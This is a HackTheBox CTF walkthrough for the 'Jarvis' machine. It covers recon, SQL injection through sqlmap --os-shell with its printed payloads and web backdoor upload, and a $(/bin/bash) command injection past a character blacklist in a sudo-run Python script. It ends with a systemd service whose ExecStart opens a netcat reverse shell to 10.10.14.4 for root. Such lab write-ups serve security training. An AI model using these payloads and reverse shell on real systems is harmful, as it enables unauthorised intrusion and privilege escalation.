Jarvis is a medium difficulty CTF on HackTheBox. This box consists of some SQL injection to gain initial access, then exploitation of a python script to get user access and ends by exploiting a Linux service.
[RECON]
Basic Nmap to get things started.
nmap -A 10.10.10.143
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-26 12:21 GMT
Nmap scan report for 10.10.10.143
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds
The Nmap results show that there is a http service running on port 80 so I went and had a look at that.
After looking around the website a little I went straight to Gobuster to look for any hidden directories.
gobuster dir -u 10.10.10.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.143
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/02/26 12:24:06 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://10.10.10.143/images/]
/css (Status: 301) [Size: 310] [--> http://10.10.10.143/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.10.143/js/]
/fonts (Status: 301) [Size: 312] [--> http://10.10.10.143/fonts/]
/phpmyadmin (Status: 301) [Size: 317] [--> http://10.10.10.143/phpmyadmin/]
Progress: 39849 / 220561 (18.07%)
I found this phpmyadmin webpage.
[WWW-DATA SHELL]
Looking around for vulnerabilities for this didn’t really get me anywhere so I started looking around the website. A lot of the links on the website didn’t work but there was this webpage at /room.php?cod=1 which after a little testing was clearly vulnerable to SQL injection so I booted up SQL map to see if I could get a shell.
sqlmap -u http://10.10.10.143/room.php?cod=1 --os-shell
___
__H__
___ ___[,]_____ ___ ___ {1.6.7#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:31:08 /2023-02-26/
[12:31:08] [INFO] resuming back-end DBMS 'mysql'
[12:31:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=qf5ls6un6s7...qo38j0jto6'). Do you want to use those [Y/n]
[12:31:12] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cod=1 AND 3821=3821
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 8277 FROM (SELECT(SLEEP(5)))IVTb)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: cod=-3100 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786b71,0x4c4c7371524a72584b6b6e77654f5473644f68466a79774355506269586f68534d794756744a7751,0x7171627871),NULL-- -
---
[12:31:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[12:31:12] [INFO] going to use a web backdoor for command prompt
[12:31:12] [INFO] fingerprinting the back-end DBMS operating system
[12:31:12] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[12:31:13] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
>
[12:31:14] [INFO] retrieved web server absolute paths: '/images/'
[12:31:14] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[12:31:14] [WARNING] unable to upload the file stager on '/var/www/'
[12:31:14] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[12:31:15] [WARNING] expect junk characters inside the file as a leftover from UNION query
[12:31:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[12:31:15] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[12:31:15] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://10.10.10.143:80/tmpubryr.php
[12:31:15] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://10.10.10.143:80/tmpbwred.php
[12:31:15] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'
os-shell>
It worked! This shell gave me some difficulties however, there wasn’t really anything that I could do with it. After some playing about with it I found that I could get a reverse shell using netcat.
From there I was able to spawn a /bin/bash terminal using the following commands:
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@jarvis:var/www/html$ export TERM=screen
export TERM=screen
www-data@jarvis:var/www/html$ clear
[USER SHELL]
Once I had user access to www-data, I started with a simple sudo -l to look at what privileges I had.
www-data@jarvis:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
This showed an interesting script simpler.py that I could as the user pepper without the need for any authentication. So I tried running the script and looking at the code:
www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
yudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
********************************************************
* Simpler - A simple simplifier ;) *
* Version 1.0 *
********************************************************
Usage: python3 simpler.py [options]
Options:
-h/--help : This help
-s : Statistics
-l : List the attackers IP
-p : ping an attacker IP
www-data@jarvis:/var/www/html$
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
In all of this code I found this exec_ping function which is called when the user chooses the -p option to ping an attacker IP. However there was a little problem, there are lots of forbidden characters which cannot be used. Luckily the bash syntax $ was not forbidden so I was able to use that to get a shell as the user pepper.
www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
y -p -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $(/bin/bash)
$(/bin/bash)
pepper@jarvis:/var/www/html$
From this point, I used another netcat listener to get a shell for pepper and grab the user flag.
[GETTING ROOT]
Once I had access to the user pepper it was time to escalate to root privileges. To look for privilege escalation vulnerabilities I downloaded LinEnum.sh and then ran it.
pepper@jarvis:/var/www/html$ wget 10.10.14.4/LinEnum.sh
wget 10.10.14.4/LinEnum.sh
--2023-02-26 08:29:01-- http://10.10.14.4/LinEnum.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'
LinEnum.sh 0%[ ] 0 --.-KB/s
LinEnum.sh 100%[===================>] 45.54K --.-KB/s in 0.05s
2023-02-26 08:29:01 (955 KB/s) - 'LinEnum.sh' saved [46631/46631]
From running LinEnum.sh, I found the systemctl SUID file to be a potential vulnerability.
From this finding I went straight to GTFObins. If you haven’t used this website before then I would highly recommend checking it out, it’s probably one of the best websites for practical information on how to exploit Unix binaries and I have used this website in a number of CTFs for privilege escalation. When searching systemctl on GTFObins it shows you how to create a Linux service and with this I was able to create another netcat listener to get a root shell when the service is run.
[Service]
Type=notify
ExecStart=/bin/bash -c "nc -e /bin/bash 10.10.14.4 4446"
KillMode=process
Restart=on-failure
RestartSec=42s
[Install]
WantedBy=multi-user.target
After running the created service I got root!